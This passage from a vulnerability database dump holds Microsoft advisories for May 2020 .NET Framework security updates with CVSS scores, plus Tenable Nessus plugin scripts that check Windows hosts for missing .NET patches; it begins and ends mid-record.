For more detailed information about SHA-2 code signing support updates, please see [KB 4474419](<https://support.microsoft.com/en-us/help/4474419/sha-2-code-signing-support-update>). \n\n**IMPORTANT** All updates for .NET Framework 4.7.2, 4.7.1, 4.7, 4.6.2, 4.6.1, and 4.6 require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see [KB 4019990](<https://support.microsoft.com/en-us/help/4019990>). \n\n**IMPORTANT** If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>). \n\n## Summary\n\nAn elevation of privilege vulnerability exists in .NET Framework which could allow an attacker to elevate their privilege level. To exploit the vulnerability, an attacker would first have to access the local machine, and then run a malicious program. The update addresses the vulnerability by correcting how .NET Framework activates COM objects. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-1066](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1066>)\nA remote code execution vulnerability exists in .NET Framework software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Framework. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. The security update addresses the vulnerability by correcting how .NET Framework checks the source markup of a file. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\nA denial of service vulnerability exists when .NET Framework improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Framework web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Framework application. The update addresses the vulnerability by correcting how the .NET Framework web application handles web requests. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n * [CVE-2020-1108](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1108>)\n\n## Known issues in some parts of this update\n\n**Symptom**| This update does not install, and it returns either or both of the following error messages:\n\n * -2146762495\n * A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file. \n---|--- \n**Workaround**| For details see the article for the .NET Framework individual product version for detailed instructions. 
\n \n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4552939](<https://support.microsoft.com/help/4552939>) Description of the Security and Quality Rollup for .NET Framework 2.0, 3.0 for Windows Server 2008 SP2 (KB4552939) \n * [4552920](<https://support.microsoft.com/help/4552920>) Description of the Security and Quality Rollup for .NET Framework 4.5.2 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and Windows Server 2008 SP2 (KB4552920) \n * [4552919](<https://support.microsoft.com/help/4552919>) Description of the Security and Quality Rollup for .NET Framework 4.6 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and Windows Server 2008 SP2 (KB4552919) \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-05-12T07:00:00", "type": "mskb", "title": "Security and Quality Rollup for .NET Framework 2.0, 3.0, 4.5.2, 4.6 for Windows Server 2008 SP2 (KB4556402)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", 
"baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0605", "CVE-2020-1066", "CVE-2020-1108"], "modified": "2020-05-12T07:00:00", "id": "KB4556402", "href": "https://support.microsoft.com/en-us/help/4556402", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:41:02", "description": "None\n## Notice\n\n**Revised 6/8/2021** On June 8th, 2021, this update was released to replace a previous update to address a \u201crevocation server was offline\u201d error that may occur during installation. If you've already installed a previous release of this update, no action is required. To obtain the latest version of these updates, see the \"How to obtain and install the update\" section of the individual update article. Links to each article are found in the \"Additional information about this update\" section of this article. On April 13th, 2021, this update was released to replace a previous release of this update.On July 23, 2020, update KB4552952 v2, KB4552951 v2, and KB4552953 v2 were released to replace v1 of those updates for .NET Framework 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, and 4.8 for Windows 7 Service Pack 1 (SP1) and Windows Server 2008 R2 SP1. The v1 updates did not install for customers who had certain ESU configurations. The v2 updates correct the issue for customers who could not install the v1 updates. \n\n**Applies to:**Microsoft .NET Framework 3.5.1 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8\n\n**IMPORTANT** Verify that you have installed the required updates listed in the **How to get this update** section before installing this update. 
\n\n**IMPORTANT** Some customers who use Windows Server 2008 R2 SP1 and have activated their ESU multiple activation key (MAK) add-on before installing the January 14, 2020 updates might need to re-activate their key. Re-activation on the affected devices should only be required once. For information on activation, see this [blog](<https://aka.ms/Windows7ESU/t_blank>) post.\n\n**IMPORTANT** WSUS scan cab files will continue to be available for Windows 7 SP1 and Windows Server 2008 R2 SP1. If you have a subset of devices running these operating systems without ESU, they might show as non-compliant in your patch management and compliance toolsets.\n\n**IMPORTANT** Customers who have purchased the [Extended Security Update (ESU)](<https://www.microsoft.com/en-us/cloud-platform/extended-security-updates>) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/en-us/help/4522133/procedure-to-continue-receiving-security-updates>) to continue receiving security updates after extended support ends on January 14, 2020. For more information on ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/en-us/help/4497181/lifecycle-faq-extended-security-updates>).\n\n**IMPORTANT** Starting on January 15, 2020, a full-screen notification will appear that describes the risk of continuing to use Windows 7 Service Pack 1 after it reaches end of support on January 14, 2020. The notification will remain on the screen until you interact with it. This notification will only appear on the following editions of Windows 7 Service Pack 1: **Note** The notification will not appear on domain-joined machines or machines in kiosk mode.\n\n * Starter.\n * Home Basic.\n * Home Premium.\n * Professional. If you have purchased the Extended Security Update (ESU), the notification will not appear. 
For more information, see [How to get Extended Security Updates for eligible Windows devices](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/archived-how-to-get-extended-security-updates-for-eligible/ba-p/917807>) and [Lifecycle FAQ-Extended Security Updates](<https://support.microsoft.com/en-us/help/4497181/lifecycle-faq-extended-security-updates>).\n * Ultimate.\n\n**IMPORTANT** Starting in August, 2019, updates to .NET Framework 4.6 and above, for Windows Server 2008 R2 SP1, and Windows 7 SP1, require SHA-2 Code signing support. Please make sure that you have all the latest Windows Updates before applying this update to avoid installation issues. For more detailed information about SHA-2 code signing support updates, please see [KB 4474419](<https://support.microsoft.com/en-us/help/4474419/sha-2-code-signing-support-update>).\n\n**IMPORTANT** All updates for .NET Framework 4.7.2, 4.7.1, 4.7, 4.6.2, 4.6.1, and 4.6 require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see [KB 4019990](<https://support.microsoft.com/en-us/help/4019990>).\n\n**IMPORTANT** If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## Summary\n\nAn elevation of privilege vulnerability exists in .NET Framework which could allow an attacker to elevate their privilege level. To exploit the vulnerability, an attacker would first have to access the local machine, and then run a malicious program. 
The update addresses the vulnerability by correcting how .NET Framework activates COM objects. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE).\n\n * [CVE-2020-1066](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1066>)\nA remote code execution vulnerability exists in .NET Framework software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Framework. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. The security update addresses the vulnerability by correcting how .NET Framework checks the source markup of a file. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE).\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\nA denial of service vulnerability exists when .NET Framework improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Framework web application. The vulnerability can be exploited remotely, without authentication. 
A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Framework application. The update addresses the vulnerability by correcting how the .NET Framework web application handles web requests. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE).\n * [CVE-2020-1108](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1108>)\n\n## Known issues in some parts of this update\n\n**Symptom**| This update does not install, and it returns either or both of the following error messages:\n\n * -2146762495\n * A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.\n * The revocation function was unable to check revocation because the revocation server was offline. \n---|--- \n**Workaround**| This issue was corrected by the latest release of the affected parts in this update. If you've already installed a previous release of the affected parts, no action is required. 
\n \n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4552965](<https://support.microsoft.com/help/4552965>) Description of the Security Only Update for .NET Framework 3.5.1 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4552965)\n * [4552952](<https://support.microsoft.com/help/4552952>) Description of the Security Only Update for .NET Framework 4.5.2 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and Windows Server 2008 SP2 (KB4552952)\n * [4552951](<https://support.microsoft.com/help/4552951>) Description of the Security Only Update for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and Windows Server 2008 SP2 (KB4552951)\n * [4552953](<https://support.microsoft.com/help/4552953>) Description of the Security Only Update for .NET Framework 4.8 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4552953)\n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-12T07:00:00", "type": "mskb", "title": "Security Only Update for .NET Framework 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows 7 SP1 and Windows Server 2008 R2 SP1 (KB4556403)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1066", "CVE-2020-1108", "CVE-2020-0605"], "modified": "2020-05-12T07:00:00", "id": "KB4556403", "href": "https://support.microsoft.com/en-us/help/4556403", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-06-16T15:25:08", "description": "The Microsoft .NET Framework installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-16T00:00:00", "type": "nessus", "title": "Security Updates for Microsoft .NET Framework (January 2020)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0646"], "modified": "2022-01-24T00:00:00", "cpe": ["cpe:/a:microsoft:.net_framework"], "id": "SMB_NT_MS20_JAN_DOTNET.NASL", "href": "https://www.tenable.com/plugins/nessus/132999", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132999);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/24\");\n\n script_cve_id(\"CVE-2020-0605\", \"CVE-2020-0606\", \"CVE-2020-0646\");\n script_xref(name:\"MSKB\", value:\"4532935\");\n script_xref(name:\"MSKB\", value:\"4535101\");\n script_xref(name:\"MSKB\", value:\"4535103\");\n script_xref(name:\"MSKB\", value:\"4535102\");\n script_xref(name:\"MSKB\", value:\"4535105\");\n script_xref(name:\"MSKB\", value:\"4535104\");\n script_xref(name:\"MSKB\", value:\"4532933\");\n script_xref(name:\"MSKB\", value:\"4534271\");\n script_xref(name:\"MSKB\", value:\"4532938\");\n script_xref(name:\"MSKB\", value:\"4534306\");\n script_xref(name:\"MSKB\", value:\"4534977\");\n script_xref(name:\"MSKB\", value:\"4534976\");\n script_xref(name:\"MSKB\", value:\"4532936\");\n script_xref(name:\"MSKB\", value:\"4534276\");\n script_xref(name:\"MSKB\", value:\"4534293\");\n script_xref(name:\"MSKB\", value:\"4534979\");\n script_xref(name:\"MSKB\", value:\"4534978\");\n 
script_xref(name:\"MSFT\", value:\"MS20-4532935\");\n script_xref(name:\"MSFT\", value:\"MS20-4535101\");\n script_xref(name:\"MSFT\", value:\"MS20-4535103\");\n script_xref(name:\"MSFT\", value:\"MS20-4535102\");\n script_xref(name:\"MSFT\", value:\"MS20-4535105\");\n script_xref(name:\"MSFT\", value:\"MS20-4535104\");\n script_xref(name:\"MSFT\", value:\"MS20-4532933\");\n script_xref(name:\"MSFT\", value:\"MS20-4534271\");\n script_xref(name:\"MSFT\", value:\"MS20-4532938\");\n script_xref(name:\"MSFT\", value:\"MS20-4534306\");\n script_xref(name:\"MSFT\", value:\"MS20-4534977\");\n script_xref(name:\"MSFT\", value:\"MS20-4534976\");\n script_xref(name:\"MSFT\", value:\"MS20-4532936\");\n script_xref(name:\"MSFT\", value:\"MS20-4534276\");\n script_xref(name:\"MSFT\", value:\"MS20-4534293\");\n script_xref(name:\"MSFT\", value:\"MS20-4534979\");\n script_xref(name:\"MSFT\", value:\"MS20-4534978\");\n script_xref(name:\"IAVA\", value:\"2020-A-0028-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Security Updates for Microsoft .NET Framework (January 2020)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft .NET Framework installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft .NET Framework installation on the remote host\nis missing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. 
Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\");\n # https://support.microsoft.com/en-us/help/4532935/kb4532935-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?71a4b34c\");\n # https://support.microsoft.com/en-us/help/4535101/kb4535101-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6dd1d619\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4535103/kb4535103\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4535102/kb4535102\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4535105/kb4535105\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4535104/kb4535104\");\n # https://support.microsoft.com/en-us/help/4532933/kb4532933-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d6758a7c\");\n # https://support.microsoft.com/en-us/help/4534271/windows-10-update-kb4534271\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e147f537\");\n # 
https://support.microsoft.com/en-us/help/4532938/kb4532938-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0f331705\");\n # https://support.microsoft.com/en-us/help/4534306/windows-10-update-kb4534306\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2fd98f0c\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4534977/kb4534977\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4534976/kb4534976\");\n # https://support.microsoft.com/en-us/help/4532936/kb4532936-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4bff0836\");\n # https://support.microsoft.com/en-us/help/4534276/windows-10-update-kb4534276\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3c9c3e46\");\n # https://support.microsoft.com/en-us/help/4534293/windows-10-update-kb4534293\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56c0e39b\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4534979/kb4534979\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4534978/kb4534978\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released security updates for Microsoft .NET Framework.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:.net_framework\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_dotnet_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"microsoft_net_framework_installed.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('install_func.inc');\ninclude('misc_func.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-01';\nkbs = make_list(\n '4532935',\n '4535101',\n '4535103',\n '4535102',\n '4535105',\n '4535104',\n '4532933',\n '4534271',\n '4532938',\n '4534306',\n '4534977',\n '4534976',\n '4532936',\n '4534276',\n '4534293',\n '4534979',\n '4534978'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, 
severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit('SMB/ProductName', exit_code:1);\nif ('Windows 8' >< productname && 'Windows 8.1' >!< productname) audit(AUDIT_OS_SP_NOT_VULN);\nelse if ('Vista' >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\napp = 'Microsoft .NET Framework';\nget_install_count(app_name:app, exit_if_zero:TRUE);\ninstalls = get_combined_installs(app_name:app);\n\nvuln = 0;\n\nif (installs[0] == 0)\n{\n foreach install (installs[1])\n {\n version = install['version'];\n if( version != UNKNOWN_VER &&\n smb_check_dotnet_rollup(rollup_date:'01_2020', dotnet_ver:version))\n vuln++;\n }\n}\nif(vuln)\n{\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-11T15:01:52", "description": "The Microsoft .NET Core installation on the remote host is version 3.0.x < 3.0.2 or 3.1.x < 3.1.1. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. (CVE-2020-0605, CVE-2020-0606)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-01-16T00:00:00", "type": "nessus", "title": "Security Update for .NET Core (January 2020)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0605", "CVE-2020-0606"], "modified": "2020-05-15T00:00:00", "cpe": ["cpe:/a:microsoft:.net_core"], "id": "SMB_NT_MS20_JAN_DOTNET_CORE.NASL", "href": "https://www.tenable.com/plugins/nessus/132993", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132993);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/15\");\n\n script_cve_id(\"CVE-2020-0605\", \"CVE-2020-0606\");\n script_xref(name:\"IAVA\", value:\"2020-A-0031-S\");\n\n script_name(english:\"Security Update for .NET Core (January 2020)\");\n script_summary(english:\"Checks for Windows Install of .NET Core.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple .NET Core vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft .NET Core installation on the remote host is version 3.0.x < 3.0.2 or 3.1.x < 3.1.1. It is, therefore,\naffected by multiple vulnerabilities:\n\n - A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of\n a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the\n current user. 
If the current user is logged on with administrative user rights, an attacker could take control of\n the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts\n with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less\n impacted than users who operate with administrative user rights. (CVE-2020-0605, CVE-2020-0606)\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4e287012\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0606\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fa0a6c3c\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/dotnet/announcements/issues/148\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/dotnet/announcements/issues/149\");\n script_set_attribute(attribute:\"solution\", value:\n\"Refer to vendor documentation.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0606\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:.net_core\");\n 
script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_dotnet_core_win.nbin\");\n script_require_keys(\"installed_sw/.NET Core Windows\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = '.NET Core Windows';\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '3.0.0', 'fixed_version' : '3.0.2' },\n { 'min_version' : '3.1.0', 'fixed_version' : '3.1.1' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-11T15:01:53", "description": "The Microsoft .NET Core SDK installation on the remote host is version 2.1.x < 2.1.511 or 2.1.608, 3.0.x < 3.0.102, or 3.1.x < 3.1.101. It is, therefore, affected by multiple vulnerabilities:\n\n - A denial of service vulnerability exists when ASP.NET Core improperly handles web requests. An attacker who successfully exploited this 